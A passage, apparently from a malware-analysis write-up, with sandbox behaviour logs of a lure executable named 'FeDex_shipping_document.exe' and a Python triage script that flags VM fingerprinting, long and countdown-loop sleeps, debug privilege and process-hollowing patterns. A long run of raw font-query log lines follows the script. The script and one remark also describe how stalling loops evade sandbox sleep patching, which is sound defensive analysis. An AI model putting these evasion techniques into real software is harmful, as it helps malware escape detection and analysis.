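Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Memory written: C:\Users\user\Desktop\FeDex_shipping_document.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
"""

EVENT_KINDS = (
    "WMI Queries", "Thread sleep time", "Thread sleep count", "Thread delayed",
    "Window / User API", "Process token adjusted", "Memory allocated",
    "Memory written", "Process created", "Process information set",
    "Queries volume information",
)
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)"
    r"(?:\s*\|?\s*TID:\s*(?P<tid>\d+))?"
    r"\s*\|?\s*(?P<kind>" + "|".join(re.escape(k) for k in EVENT_KINDS) + r"):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)

# Assumption: delays are printed in milliseconds; the report's ">= 3 min"
# signature and its 30000 threshold are consistent with that.
LONG_SLEEP_MS = 3 * 60 * 1000
# .NET TimeSpan.MaxValue in whole milliseconds (Int64.MaxValue ticks / 10000).
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
# WMI classes commonly read to fingerprint a VM (vendor strings, MAC OUIs, CPU).
VM_FINGERPRINT_CLASSES = {c.lower() for c in (
    "Win32_BaseBoard", "Win32_BIOS", "Win32_Processor", "Win32_ComputerSystem",
    "Win32_NetworkAdapter", "Win32_NetworkAdapterConfiguration", "Win32_DiskDrive",
)}


def parse_events(text):
    """Parse report lines into dicts; lines of an unknown shape are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def delay_ms(detail):
    """First integer in the detail. NtDelayExecution takes a negative value for a
    relative interval and the sandbox prints that sign; only the magnitude matters."""
    return abs(int(re.search(r"-?\d+", detail).group()))


def triage(text):
    findings = {
        "vm_wmi_classes": set(), "long_sleeps": 0, "infinite_sleeps": 0,
        "countdown_loop": False, "debug_privilege": False,
        "mz_write_bases": [], "self_injection": False,
    }
    delays, spawned_self, mz_targets = [], set(), set()
    for e in parse_events(text):
        kind, detail, src = e["kind"], e["detail"], e["src"].lower()
        if kind == "WMI Queries":
            findings["vm_wmi_classes"].update(
                c for c in re.findall(r"Win32_\w+", detail) if c.lower() in VM_FINGERPRINT_CLASSES)
        elif kind in ("Thread sleep time", "Thread delayed"):
            ms = delay_ms(detail)
            if ms >= TIMESPAN_MAX_MS:
                findings["infinite_sleeps"] += 1   # Thread.Sleep(TimeSpan.MaxValue)-style wait
            elif ms >= LONG_SLEEP_MS:
                findings["long_sleeps"] += 1
            if kind == "Thread delayed":
                delays.append(ms)
        elif kind == "Process token adjusted" and "Debug" in detail:
            findings["debug_privilege"] = True     # SeDebugPrivilege enabled
        elif kind == "Process created":
            # Detail is "<image> <command line>"; assumption: image paths have no spaces.
            if detail.split() and detail.split()[0].lower() == src:
                spawned_self.add(src)
        elif kind == "Memory written":
            m = re.match(r"(?P<target>.+?\.exe)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
                         r"\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+)", detail)
            if m and m.group("magic").upper().startswith("4D5A"):   # "MZ": a PE header
                findings["mz_write_bases"].append(int(m.group("base"), 16))
                mz_targets.add(m.group("target").lower())
        # "Queries volume information" and similar loader side effects are ignored.

    # A run of delays that each shrink by a small step is a loop re-arming the
    # remaining wait; it survives sandboxes that shortcut one long Sleep().
    run = 1
    for prev, cur in zip(delays, delays[1:]):
        run = run + 1 if 0 < prev - cur < 1000 else 1
        if run >= 4:
            findings["countdown_loop"] = True
            break
    # A copy of itself spawned, plus a PE header written into a process with that
    # image path, is the RunPE / process-hollowing pattern.
    findings["self_injection"] = bool(spawned_self & mz_targets)
    findings["vm_wmi_classes"] = sorted(findings["vm_wmi_classes"])
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

The countdown check is the part worth keeping when adapting this to other reports: a single 20-minute sleep is easy for a sandbox to skip, but a loop that re-issues the remaining wait in sub-second steps (1200000, 1199750, 1199609, ...) is what makes the stall robust against sleep patching, and it shows up in the log as exactly that decreasing series.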
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Queries volume information (VolumeInformation), 45 font files under C:\Windows\Fonts\: arial.ttf, ariali.ttf, arialbd.ttf, arialbi.ttf, ARIALN.TTF, ariblk.ttf, ARIALNI.TTF, ARIALNB.TTF, ARIALNBI.TTF, bahnschrift.ttf, calibri.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf, Candara.ttf, Candarai.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf, consola.ttf, consolai.ttf, consolab.ttf, consolaz.ttf, constan.ttf, constani.ttf, constanb.ttf, constanz.ttf, corbel.ttf, corbeli.ttf, corbelb.ttf, corbelz.ttf, cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
